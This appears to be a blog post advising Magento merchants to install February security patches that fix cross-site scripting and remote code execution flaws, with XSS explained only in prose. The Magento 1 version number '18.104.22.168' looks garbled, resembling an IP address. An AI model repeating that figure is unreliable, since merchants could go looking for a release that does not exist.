Towards the end of last month, Magento released a number of updates that contain patches for security vulnerabilities in Magento 2. Magento eCommerce merchants should install the security updates at their earliest convenience. The patches fix cross-site scripting vulnerabilities and remote code execution vulnerabilities that could be used by an attacker steal sensitive data or target the store and its customers with further attacks.
If you are a Magento 2 Open Source user, the full versions and patches can be downloaded from the Magento Open Source Download Page along with instructions for installing patches and upgrading. Magento Commerce users can find more information in the Downloads section of their account dashboard.
Magento versions that include the fixes are Magento Open Source 2.2.3 and Magento Open Source 2.1.12. Magento 2.0 was also updated with Magento Open Source 2.0.18, and it should be noted that this is the final release of the 2.0 line, which will no longer be supported.
Magento 1 users should install Magento Open Source 18.104.22.168 or patch with SUPEE-10415, which fixes a similar range of security vulnerabilities.
These are serious vulnerabilities and we encourage Magento users to update or apply the patches as soon as possible.
Cross-site scripting attacks use scripts injected into the front-end of a web application to execute arbitrary code when a page is loaded by a web browser. For instance, an attacker might inject code that sends the cookie of a logged-in user to their server, enabling them to access a store as that user.
Depending on the privileges of the user who loads the infected page, a cross-site scripting attack can be used to take over a site: consider the consequences if an admin user has their authentication cookie stolen.
The Magento patches released in February include fixes for a cross-site scripting vulnerability that could allow an attacker to inject code in a storefront form field that would be executed in the context of the admin panel. Less serious cross-site scripting vulnerabilities fixed by the patches include vulnerabilities that allowed a user to insert code in their address or other customer information.
Remote Code Execution
The patches also fixed a potential remote code execution vulnerability that may allow an administrator with limited privileges to execute code during the “CMS image or media upload process.”
A number of other less serious — but still dangerous — vulnerabilities were also fixed. You can see a full list in this post on the Magento Security Center
In addition to security patches, the new releases include a number of enhancements, including support for upcoming changes to USPS shipping, support for Elasticsearch 5.0, and enhancements to ACL control for cache management.